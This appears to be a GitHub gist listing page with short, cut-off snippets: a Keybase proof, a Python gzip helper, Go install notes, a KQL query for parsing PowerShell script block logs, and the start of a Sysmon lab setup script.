I hereby claim:
- I am mavjs on github.
- I am mavjs (https://keybase.io/mavjs) on keybase.
- I have a public key ASDiTsnsLVeolOAND9VB-1xXIrQN2ZEIm4IPafZizc2Ftgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
import gzip | |
import io | |
def gzip_str(string_): | |
out = io.BytesIO() | |
with gzip.GzipFile(fileobj=out, mode='w') as fo: | |
fo.write(string_.encode()) | |
bytes_obj = out.getvalue() |
If your $GOROOT
is in ~/goroot
and your $GOPATH
is in ~/go
, you want to make sure that your new go version goes to the right folder.
By default the go tar file will unpack with go/
as a prefix directory, thus we want to remove that when unpacking, thus the --strip-components=1
.
tar -C ~/goroot -xzvf go$VERSION.linux-amd64.tar.gz --strip-components=1
Event | |
| where EventID == "4104" | |
| extend ParsedEvent = parse_xml(strcat("<root>", ParameterXml, "</root>")) | |
| extend MessageNumber = tolong(ParsedEvent.root.Param[0]) | |
| extend MessageTotal = tolong(ParsedEvent.root.Param[1]) | |
| extend ScriptBlockElement = iff( | |
strlen(tostring(ParsedEvent.root.Param[2]["#text"])) > 0, | |
ParsedEvent.root.Param[2]["#text"], | |
ParsedEvent.root.Param[2]) | |
| extend ScriptBlockId = tostring(ParsedEvent.root.Param[3]) |
<# | |
Meta | |
Date: 2022 March 28th | |
Authors: Dray Agha (Twitter @purp1ew0lf) | |
Company: Huntress Labs | |
Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab. | |
#> | |
function admin_check{ | |
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(` |